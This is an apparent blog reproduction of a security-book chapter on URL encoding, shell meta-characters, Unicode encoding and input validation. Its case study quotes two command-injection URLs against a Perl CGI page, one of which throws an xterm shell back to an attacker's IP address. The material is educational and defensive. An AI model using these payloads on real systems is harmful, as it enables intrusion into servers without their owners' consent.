Wednesday, December 16, 2009

URL Encoding








By themselves, URLs are nothing but
alphanumeric strings, with some other symbols thrown in. The character set
chosen to express a URL string consists of the following symbols:



Symbols                     Values

Alphanumeric symbols        A-Z, a-z, 0-9
Reserved symbols            ; / ? : @ & = + $ , < > # % "
Other special characters    - _ . ! ~ * ' ( ) { } | \ ^ [ ] `




For the most part, a URL string consists of
letters, numbers, and reserved symbols that have special meaning within the URL
string. Other special characters are found in some URL strings, although they
don't have any special meaning as far as the URL is concerned. However, they
may have special meaning for the Web server receiving the URL or the
application that is requested via the Web server.



Interpretations of some of these special
characters are presented in Table 5-2.



Meta-Characters



Characters such as * and ; and | and ` have
special meanings as meta-characters in applications and scripts. These
characters don't affect the URL in any way, but if they end up making their way
into applications, they may change the meaning of the input altogether and
sometimes create gaping security holes.



Table 5-2. Special Characters and Their Meaning Within a URL

Special Character    Interpretation

?    Query String separator. The part of the URL string to the right
     of the ? symbol is the Query String.

&    Parameter delimiter. Used to separate name=value parameter pairs
     on the Query String.

=    Separates the parameter name from the parameter value when
     passing parameters on the Query String.

+    Translated into a space.

:    Protocol separator. The portion of the URL string from the
     beginning to the : symbol specifies the application layer protocol
     to be used when requesting the resource.

#    Used to specify an anchor point within a Web page. For example,
     the URLs http://www.acme-art.com/index.html#gallery and
     http://www.acme-art.com/index.html#purchase take you to two
     different locations within the same page, index.html.

%    Used as an escape character for specifying hexadecimal encoded
     characters.

@    Used in mailto: URLs when specifying Internet e-mail addresses,
     or when passing user login credentials to a password protected
     resource, especially over FTP.

~    Used for specifying a user's home directory on a multiuser
     system such as Unix. The URL looks like
     http://server/~user_login_id/. For example,
     http://www.cs.purdue.edu/~saumil/ maps to the Web page
     subdirectory within user saumil's account on the system.
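To make the roles of these separators concrete, here is a minimal sketch using Python's standard urllib.parse module. The URL and its parameter names (page, title) are made up for illustration and do not come from the case study.

```python
from urllib.parse import urlsplit, parse_qsl

# Hypothetical URL that uses several of the special characters in Table 5-2.
url = "http://www.acme-art.com/index.cgi?page=gallery&title=still+life#purchase"

parts = urlsplit(url)
print(parts.scheme)    # text before the ':' protocol separator
print(parts.netloc)    # host name
print(parts.path)      # resource path
print(parts.query)     # everything between '?' and '#'
print(parts.fragment)  # anchor point after '#'

# '&' delimits the pairs, '=' splits name from value, '+' becomes a space.
params = parse_qsl(parts.query)
print(params)
```

Note that the parser assigns meaning to each symbol purely by position, which is why a literal & or + inside a value has to be encoded.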




Many meta-characters are interpreted
differently by different Web servers. Table 5-3 describes
how various meta-characters are interpreted inside applications.



Specifying Special Characters on the URL String



The question that arises now is, "What
if we want to specify special characters such as % or ? or & or + without
giving them any special meaning?" For example, suppose we want to pass two
parameters, book=pride&prejudice and shipping=snailmail, on the Query
String. In this case, the URL is:



http://mycheapbookshop.com/purchase.cgi?book=pride&prejudice&shipping=snailmail



Table 5-3. Meta-Characters and Their Meanings

Meta-Character    Interpretation/Use

*    The star character is used as a wild card or a file globbing
     character. In Unix shell scripts, the asterisk character expands
     to the list of filenames present in the current directory.

;    The semicolon character has many meanings in many different
     contexts. The most common use of a semicolon is to terminate
     lines of source code in languages such as C or Perl. In other
     contexts, the semicolon is also used as a command separator, as
     in Bourne shell scripts and SQL queries.

|    The pipe character, if sneaked through without proper checking,
     can play havoc. It is one of the most powerful characters in
     Unix shell scripts, second only to the grave accent character `.
     The pipe joins two commands by redirecting the standard output
     of the first command to the standard input of the second
     command. In Perl scripts, if a pipe character is used as a
     suffix or prefix to the filename when it is opened, the filename
     is treated as a system command and is executed by the OS shell.
     The file handle then receives the output generated by the
     program that is executed.

`    The grave accent character (commonly called a back-tick or a
     back-quote) is used for command output substitution and is the
     most powerful character in Unix shell scripting. If a Unix shell
     command is bounded by grave accents, the output of the command
     is substituted for it and returned to the variable to which the
     assignment is made. For example, files=`ls -la` causes the shell
     variable "files" to be set to the output of the command ls -la.








Meta-Characters and Input Validation


Lack of proper input validation is the single most prominent cause of Web
application vulnerabilities, accounting for over 90% of them. The
concept of input validation isn't new. During our days of writing Fortran
code in college, the instructor used to perform manual input validation
before giving us credit for the code submitted. One of the programs to be
written calculated the natural logarithm of a number. None of the
students' code ever made it past the first input given by the
instructor, "banana", when the program was expecting a number! Given
unexpected input, the program would crash and dump core. In those days,
little did we realize the importance of proper input validation. Making an
xterm pop out by forcing meta-characters and Unix commands into a Web page
form is perhaps the epitome of elegant Web hacks, and it is attributable
entirely to weak input validation.
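As a rough illustration of the logarithm anecdote, the sketch below validates input against a whitelist pattern before using it. The function name safe_natural_log and the accepted number format are assumptions made for this example, not anything from the original Fortran assignment.

```python
import math
import re

# Whitelist: optional sign, ASCII digits, optional fractional part.
# Anything else (letters, ';', '|', '`', ...) is rejected outright.
NUMBER_PATTERN = re.compile(r"[+-]?[0-9]+(\.[0-9]+)?")


def safe_natural_log(raw_input: str) -> float:
    """Return ln(raw_input), raising ValueError on unexpected input."""
    text = raw_input.strip()
    if not NUMBER_PATTERN.fullmatch(text):
        raise ValueError(f"expected a number, got {raw_input!r}")
    value = float(text)
    if value <= 0:
        raise ValueError("natural logarithm requires a positive number")
    return math.log(value)


for candidate in ("2.5", "banana", "1; xterm"):
    try:
        print(candidate, "->", safe_natural_log(candidate))
    except ValueError as error:
        print(candidate, "-> rejected:", error)
```

The design choice here is to describe what valid input looks like and reject everything else, rather than trying to enumerate every dangerous meta-character.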




The bookshop URL shown earlier is ambiguous because there
are two & symbols in the Query String, only one of which is meant as a
parameter delimiter. Most likely, a Web server would
split such a Query String into three parameters instead of two: namely,
book=pride, prejudice= and shipping=snailmail.



If we want to pass the & symbol as part
of the parameter value, the URL specification allows us to express reserved and
special characters in a two-digit hexadecimal encoded ASCII format, prefixed
with a % symbol, as follows:



Characters                      Hex Values

All hex encoded characters      %XX (%00-%FF)
Control characters              %00-%1F, %7F
Upper 8-bit ASCII characters    %80-%FF
Space                           %20 or +
Carriage return                 %0D
Line feed                       %0A




In the preceding example, the ASCII value of
the & symbol is 38 in decimal and 26 in hexadecimal. Therefore, if we want
to express the & symbol, we can use %26 in its place. The URL in the
example would become:



http://mycheapbookshop.com/purchase.cgi?book=pride%26prejudice&shipping=snailmail
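The difference between the two Query Strings can be checked with a short sketch based on Python's urllib.parse. This shows how one common parser behaves; a given Web server may split the ambiguous string differently.

```python
from urllib.parse import parse_qsl, quote, urlencode

# Unencoded '&' inside the value: the parser sees three parameters.
ambiguous = "book=pride&prejudice&shipping=snailmail"
ambiguous_params = parse_qsl(ambiguous, keep_blank_values=True)
print(ambiguous_params)

# Percent-encode the value so '&' (ASCII 0x26) becomes %26.
encoded_value = quote("pride&prejudice", safe="")
print(encoded_value)

# urlencode builds the whole Query String and encodes each value for us.
query = urlencode({"book": "pride&prejudice", "shipping": "snailmail"})
print(query)

# Decoding the encoded Query String recovers the intended two parameters.
decoded_params = parse_qsl(query)
print(decoded_params)
```

Building the Query String with a library call such as urlencode, instead of concatenating strings by hand, avoids forgetting to encode a reserved character.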



Unicode Encoding



Hexadecimal ASCII encoding, while serving
its purpose for the most part, isn't broad enough to represent character sets
larger than 256 symbols. Most modern operating systems and applications support
multibyte representations of character sets of languages other than English. Microsoft's
IIS Web server supports URLs containing characters encoded with the multibyte UCS
Transformation Format (UTF-8), in addition to hexadecimal ASCII encoding.



The Acme Art, Inc., Hack


Let's take a look at two URLs launched by
the attacker on www.acme-art.com, presented in the Part One Case Study. The
URLs are:


http://www.acme-art.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|


http://www.acme-art.com/index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26|


The hacker used meta-characters and URL
encoding carefully. The value passed in the page= parameter ends up being used as
a filename in the open() function in index.cgi's Perl code. The attacker placed
pipe characters around the commands to cause Perl to run them and return
the output. The first URL has three Unix commands separated by the linefeed
character %0A, which has the same effect as hitting the Enter key between
commands, so the three commands ran in succession. The second URL throws an
xterm back to the attacker's system. Note how the attacker sneaked in the
ampersand character as %26 so that it would not be treated as a parameter
delimiter, causing the xterm process to be spawned as a background
process.
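To see what the application actually receives, the sketch below decodes the page parameter of both attack URLs with Python's urllib.parse. It only decodes the strings and never executes them; the helper name decoded_page_parameter is made up for this example.

```python
from urllib.parse import urlsplit, parse_qsl

attack_urls = [
    "http://www.acme-art.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|",
    "http://www.acme-art.com/index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26|",
]


def decoded_page_parameter(url: str) -> str:
    """Return the URL-decoded value of the 'page' parameter."""
    query = urlsplit(url).query
    return dict(parse_qsl(query))["page"]


for url in attack_urls:
    # repr() makes the embedded linefeeds visible as \n.
    print(repr(decoded_page_parameter(url)))
```

After decoding, the + symbols have become spaces, %0a has become a linefeed, and %26 has become a literal &, which is exactly the text that reaches Perl's open().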




The Universal Character Set (UCS) is defined
by the International Organization for Standardization's draft ISO 10646. Although UCS is
maintained by ISO, a separate group was formed (primarily by software vendors)
to allow representation of a variety of character sets with one unified scheme.
This group came to be known as the Unicode Consortium
(http://www.unicode.org). As
standards were developed, the Unicode Consortium and ISO decided to adopt a common
representation scheme so that the computing world didn't have to deal with separate
standards for the same thing. UTF-8 encoding is defined in ISO 10646-1:2000 and in RFC
2279. For operating systems that have been designed around the ASCII character
encoding scheme, UTF-8 allows for easy conversion and representation of multibyte
Unicode characters using ASCII mappings.



Without going into the intricacies of how
UTF-8 works, let's look at Unicode encoding from a URL's point of view. Two-byte
Unicode characters are encoded by using %uXXYY, where XX and YY are hexadecimal
values of the higher and lower byte respectively. For the standard ASCII
characters %00 to %FF, the Unicode representation is %u0000 to %u00FF. The Web
server decodes 16 bits at a time when dealing with Unicode encoded symbols.
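The %uXXYY notation can be illustrated with a small decoder. This is a minimal sketch: %u encoding is a nonstandard, IIS-style convention that Python's urllib.parse does not decode, so the function decode_percent_u below is a hypothetical helper written for this example. The last line shows, for contrast, the standard UTF-8 percent-encoding of a non-ASCII character.

```python
import re
from urllib.parse import quote

# Matches %u followed by exactly four hexadecimal digits (XX then YY).
_PERCENT_U = re.compile(r"%u([0-9A-Fa-f]{4})")


def decode_percent_u(text: str) -> str:
    """Replace each %uXXYY sequence with the character U+XXYY."""
    return _PERCENT_U.sub(lambda match: chr(int(match.group(1), 16)), text)


# ASCII characters map to %u0000-%u00FF, so "AB" can be written this way:
print(decode_percent_u("%u0041%u0042"))

# The same trick can disguise path characters such as "../":
print(decode_percent_u("%u002e%u002e%u002f"))

# Standard UTF-8 percent-encoding of a non-ASCII character, for comparison.
print(quote("é"))
```

Because the same character can be written in several encoded forms, input checks are more reliable when applied after all decoding has been done.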



 




